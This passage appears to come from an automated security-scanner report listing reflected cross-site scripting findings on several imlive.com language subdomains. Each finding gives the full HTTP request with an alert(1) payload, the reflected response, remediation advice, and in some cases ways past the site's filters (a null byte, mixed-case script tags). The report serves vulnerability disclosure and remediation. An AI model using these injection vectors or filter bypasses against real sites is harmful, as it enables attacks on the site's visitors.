This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?e9277'-alert(1)-'48bfaebef6a=1 HTTP/1.1
Host: ru.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=wgqean55lrgsk5blfe2amn55; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=wgqean55lrgsk5blfe2amn55; path=/; HttpOnly
Set-Cookie: spvdr=vd=591f9b95-a40e-412c-8b3f-904dd62e2a06&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:23 GMT; path=/
Set-Cookie: iru=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:23 GMT
Connection: close
Content-Length: 21036
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru-RU" lang="ru-RU" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=ru.imlive.com&ul=/?e9277'-alert(1)-'48bfaebef6a=1&qs=e9277'-alert(1)-'48bfaebef6a=1&qs=e9277'-alert(1)-'48bfaebef6a=1&iy=dallas&id=44&iu=1&vd=591f9b95-a40e-412c-8b3f-904dd62e2a06';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

2.165. http://ru.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ru.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ba898"><script>alert(1)</script>ea1f44e02c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ba898"><script>alert(1)</script>ea1f44e02c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /?%00ba898"><script>alert(1)</script>ea1f44e02c1=1 HTTP/1.1
Host: ru.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=uf21xp55pihpngiikgmtjpi1; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=uf21xp55pihpngiikgmtjpi1; path=/; HttpOnly
Set-Cookie: spvdr=vd=ca385023-6a55-4da9-9adc-27df877ab4ee&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:22 GMT; path=/
Set-Cookie: iru=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:22 GMT
Connection: close
Content-Length: 21515
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru-RU" lang="ru-RU" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||%00ba898"><script>alert(1)</script>ea1f44e02c1~1');return false;">
...[SNIP]...

2.166. http://ru.imlive.com/waccess/ [gotopage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ru.imlive.com
Path:   /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8a0cf'onerror%3d'alert(1)'9653cda9fbc was submitted in the gotopage parameter. This input was echoed as 8a0cf'onerror='alert(1)'9653cda9fbc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/8a0cf'onerror%3d'alert(1)'9653cda9fbc HTTP/1.1
Host: ru.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:28 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: iru=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSQSQQASC=MBDGAJMAPJDFGCLMLOHPEKEG; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:28 GMT
Connection: close
Content-Length: 8316
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=ru.imlive.com&ul=/webcam-login/8a0cf'onerror='alert(1)'9653cda9fbc/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://ru.imlive.com:80/webcam-login/8a0cf'onerror='alert(1)'9653cda9fbc/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

2.167. http://se.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://se.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6521b"><ScRiPt>alert(1)</ScRiPt>71abce1a13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /?6521b"><ScRiPt>alert(1)</ScRiPt>71abce1a13=1 HTTP/1.1
Host: se.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=0tjglprt0uhefg450loh0w45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=0tjglprt0uhefg450loh0w45; path=/; HttpOnly
Set-Cookie: spvdr=vd=a76d7abf-e00b-41da-8545-88bfbdcb7dc0&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:24 GMT; path=/
Set-Cookie: ise=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:23 GMT
Connection: close
Content-Length: 19198
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sv-SE" lang="sv-SE" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||6521b"><script>alert(1)</script>71abce1a13~1');return false;">
...[SNIP]...

2.168. http://se.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://se.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 955da'-alert(1)-'35a7f28024d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?955da'-alert(1)-'35a7f28024d=1 HTTP/1.1
Host: se.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=cxo1wv55m2eptp452f1nrc55; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=cxo1wv55m2eptp452f1nrc55; path=/; HttpOnly
Set-Cookie: spvdr=vd=b1cdde81-f68f-4457-8c41-9bd67759ee7d&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:24 GMT; path=/
Set-Cookie: ise=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:24 GMT
Connection: close
Content-Length: 18822
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sv-SE" lang="sv-SE" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=se.imlive.com&ul=/?955da'-alert(1)-'35a7f28024d=1&qs=955da'-alert(1)-'35a7f28024d=1&qs=955da'-alert(1)-'35a7f28024d=1&iy=dallas&id=44&iu=1&vd=b1cdde81-f68f-4457-8c41-9bd67759ee7d';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

2.169. http://se.imlive.com/waccess/ [gotopage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://se.imlive.com
Path:   /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 50044'onerror%3d'alert(1)'c69d85712e5 was submitted in the gotopage parameter. This input was echoed as 50044'onerror='alert(1)'c69d85712e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=50044'onerror%3d'alert(1)'c69d85712e5 HTTP/1.1
Host: se.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:34 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ise=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSQRSRDRD=OMEHEKMACGAIHNLGCDDKMGHM; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:34 GMT
Connection: close
Content-Length: 8306
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=se.imlive.com&ul=/waccess/50044'onerror='alert(1)'c69d85712e5/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://se.imlive.com:80/waccess/50044'onerror='alert(1)'c69d85712e5/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

2.170. http://tr.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tr.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2afd4'-alert(1)-'3181e4bce5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?2afd4'-alert(1)-'3181e4bce5=1 HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=a1eyxe45csoeo145imhg5vfy; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=a1eyxe45csoeo145imhg5vfy; path=/; HttpOnly
Set-Cookie: spvdr=vd=59ea87f5-6021-4c78-b7d1-1f922fc6dbd0&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:34 GMT; path=/
Set-Cookie: itr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:33 GMT
Connection: close
Content-Length: 19276
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="tr-TR" lang="tr-TR" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=tr.imlive.com&ul=/?2afd4'-alert(1)-'3181e4bce5=1&qs=2afd4'-alert(1)-'3181e4bce5=1&qs=2afd4'-alert(1)-'3181e4bce5=1&iy=dallas&id=44&iu=1&vd=59ea87f5-6021-4c78-b7d1-1f922fc6dbd0';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEv
...[SNIP]...

2.171. http://tr.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tr.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4282"><script>alert(1)</script>18266d653ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d4282"><script>alert(1)</script>18266d653ee=1 HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=5vcekb45xpt03o55sfewid55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=5vcekb45xpt03o55sfewid55; path=/; HttpOnly
Set-Cookie: spvdr=vd=73be72ba-f032-4534-9729-f91765d9dbef&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:33 GMT; path=/
Set-Cookie: itr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:32 GMT
Connection: close
Content-Length: 19702
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="tr-TR" lang="tr-TR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||d4282"><script>alert(1)</script>18266d653ee~1');return false;">
...[SNIP]...

2.172. http://ar.imlive.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ar.imlive.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e41c'-alert(1)-'966bdb815ef was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=9e41c'-alert(1)-'966bdb815ef

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=a50m4b45qikd1i4514x4hlbg; path=/; HttpOnly
Set-Cookie: par=; expires=Thu, 27-Jan-2011 14:16:47 GMT; path=/
Set-Cookie: ASP.NET_SessionId=a50m4b45qikd1i4514x4hlbg; path=/; HttpOnly
Set-Cookie: par=; expires=Thu, 27-Jan-2011 14:16:47 GMT; path=/
Set-Cookie: spvdr=vd=4e3caa11-2c53-455d-aeb6-23456dfa827b&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:47 GMT; path=/
Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:46 GMT
Connection: close
Content-Length: 18423
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=ar.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=9e41c'-alert(1)-'966bdb815ef&iy=dallas&id=44&iu=1&vd=4e3caa11-2c53-455d-aeb6-23456dfa827b';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

2.173. http://ar.imlive.com/waccess/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ar.imlive.com
Path:   /waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 803bf'-alert(1)-'0a99d8be53c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=803bf'-alert(1)-'0a99d8be53c

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ewf5ejes3cp04k55nvht3p45; path=/; HttpOnly
Set-Cookie: par=; expires=Thu, 27-Jan-2011 14:16:53 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ewf5ejes3cp04k55nvht3p45; path=/; HttpOnly
Set-Cookie: par=; expires=Thu, 27-Jan-2011 14:16:53 GMT; path=/
Set-Cookie: spvdr=vd=567a60ee-ed7f-4de5-bea0-26314350146c&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:53 GMT; path=/
Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:52 GMT
Connection: close
Content-Length: 20847
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/login.aspx&he=ar.imlive.com&ul=/webcam-login/&rf=http://www.google.com/search?hl=en^q=803bf'-alert(1)-'0a99d8be53c&iy=dallas&id=44&iu=1&vd=567a60ee-ed7f-4de5-bea0-26314350146c';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

2.174. http://br.imlive.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://br.imlive.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27acf'-alert(1)-'861f82f4c0a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=27acf'-alert(1)-'861f82f4c0a

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=nkg2nsbntcdfpjbrfiayib55; path=/; HttpOnly
Set-Cookie: pbr=; expires=Thu, 27-Jan-2011 14:16:54 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=nkg2nsbntcdfpjbrfiayib55; path=/; HttpOnly
Set-Cookie: pbr=; expires=Thu, 27-Jan-2011 14:16:54 GMT; path=/
Set-Cookie: spvdr=vd=76a3aa87-b7ef-43f9-a928-b6a2beb486e7&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:54 GMT; path=/
Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:16:54 GMT
Connection: close
Content-Length: 18277
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=br.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=27acf'-alert(1)-'861f82f4c0a&iy=dallas&id=44&iu=1&vd=76a3aa87-b7ef-43f9-a928-b6a2beb486e7';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

2.175. http://br.imlive.com/waccess/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://br.imlive.com
Path:   /waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a328'-alert(1)-'eadcfd684a2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

